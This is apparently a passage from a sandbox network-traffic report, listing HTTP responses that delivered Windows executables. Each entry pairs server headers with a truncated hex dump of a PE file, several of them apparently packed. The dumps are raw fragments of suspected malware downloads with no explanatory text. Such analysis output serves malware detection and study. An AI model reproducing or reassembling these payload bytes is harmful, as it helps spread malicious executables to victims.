00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:12 GMTContent-Type: application/octet-streamContent-Length: 354816Last-Modified: Thu, 13 Jan 2022 22:06:44 GMTConnection: keep-aliveETag: "61e0a274-56a00"Expires: Thu, 20 Jan 2022 23:16:12 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 08 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 61 01 00 c8 00 00 00 00 80 01 00 34 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 64 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 a2 cf 00 00 00 50 00 00 00 d0 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 33 00 00 00 20 01 00 00 34 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 17 00 00 00 60 01 00 00 12 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 16 04 00 00 80 01 00 00 18 04 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:13 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 34272Last-Modified: Thu, 13 Jan 2022 21:50:37 GMTConnection: keep-aliveETag: "61e09ead-85e0"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 34 e0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 26 00 00 00 70 00 00 00 00 00 00 9e 45 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 45 00 00 57 00 00 00 00 60 00 00 b0 48 00 00 00 00 00 00 00 00 00 00 00 74 00 00 e0 11 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 25 00 00 00 20 00 00 00 26 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 48 00 00 00 60 00 00 00 4a 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 45 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 26 00 00 cc 16 00 00 03 00 00 00 08 00 00 06 2c 3d 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9c 13 30 fe 2b ae 5a d6 7a ac f3 43 b7 f3 d0 4f 41 f6 2c d8 0f c4 35 18 75 73 0e e1 16 be ef a3 3f 19 94 62 e8 f0 e1 8a fb 85 b8 87 59 42 e8 ad d3 f8 5b fd 4f 1a cd d7 dd 18 89 b6 a0 77 bf ba bb 4f 04 9e 5e 6e 66 4f 15 a1 dc 89 0c ac bd 32 89 5f 0e 1d 62 f1 53 25 4b bc 84 cf 67 2a e9 83 c4 fc ca 09 3e 4a 4e 65 92 0c e8 ad 3d 43 ca 30 5a 56 2c 40 69 a2 00 22 02 28 01 00 00 0a 00 2a 00 00 00 13 30 02 00 33 00 00 00 01 00 00 11 00 2b 0f 2b 14 2b 15 2b 16 2b 1b 2b 20 2b 00 2b 1f 2a 28 16 00 00 0a 2b ea 0a 2b e9 06 2b e8 28 05 00 00 06 2b e3 6f 17 00 00 0a 2b de 0b 2b dd 07 2b de 00 1b 30 06 00 af 00 00 00 02 00 00 11 00 00 20 00 0c 00 00 2b 04 00 00 de 0c 28 4f 00 00 0a 2b f5 26 00 00 de 00 d0 46 00 00 01 2b 57 72 01 00 00 70 28 02 00 00 06 72 29 00 00 70 28 02 00 00 06 72 2d 00 00 70 28 02 00 00 06 2b 3e 17 8d 18 00 00 01 25 16 d0 19 00 00 01 2b 36 a2 2b 3a 2b 3f 17 8d 01 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 79 e0 61 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 70 03 00 00 04 00 00 00 00 00 00 12 8e 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 fc a7 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 8d 03 00 4f 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 0c 00 00 00 88 8c 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6e 03 00 00 20 00 00 00 70 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 03 00 00 02 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 8d 03 00 00 00 00 00 48 00 00 00 02 00 05 00 00 98 00 00 d0 68 00 00 03 00 02 00 01 00 00 06 d0 00 01 00 b8 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 28 15 00 00 0a 00 16 28 16 00 00 0a 00 73 0a 00 00 06 28 17 00 00 0a 00 2a 26 02 28 18 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 03 00 00 02 28 19 00 00 0a 6f 1a 00 00 0a 73 1b 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 03 00 21 00 00 00 03 00 00 11 00 28 03 00 00 06 72 63 00 00 70 7e 02 00 00 04 6f 1c 00 00 0a 0a 06 74 01 00 00 1b 0b 2b 00 07 2a 00 00 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 08 00 00 06 28 1e 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 5e 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 14 00 00 06 00 2a 00 00 13 30 01 00 0f 00 00 00 05 00 00 11 00 73 38 00 00 06 0a 06 6f 20 00 00 0a
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:21 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 19:32:17 GMTConnection: keep-aliveETag: "61e07e41-82ac0"Expires: Thu, 20 Jan 2022 23:16:21 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:21 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 21:51:04 GMTConnection: keep-aliveETag: "61e09ec8-82ac0"Expires: Thu, 20 Jan 2022 23:16:21 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:22 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 20:12:05 GMTConnection: keep-aliveETag: "61e08795-246ec0"Expires: Thu, 20 Jan 2022 23:16:22 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 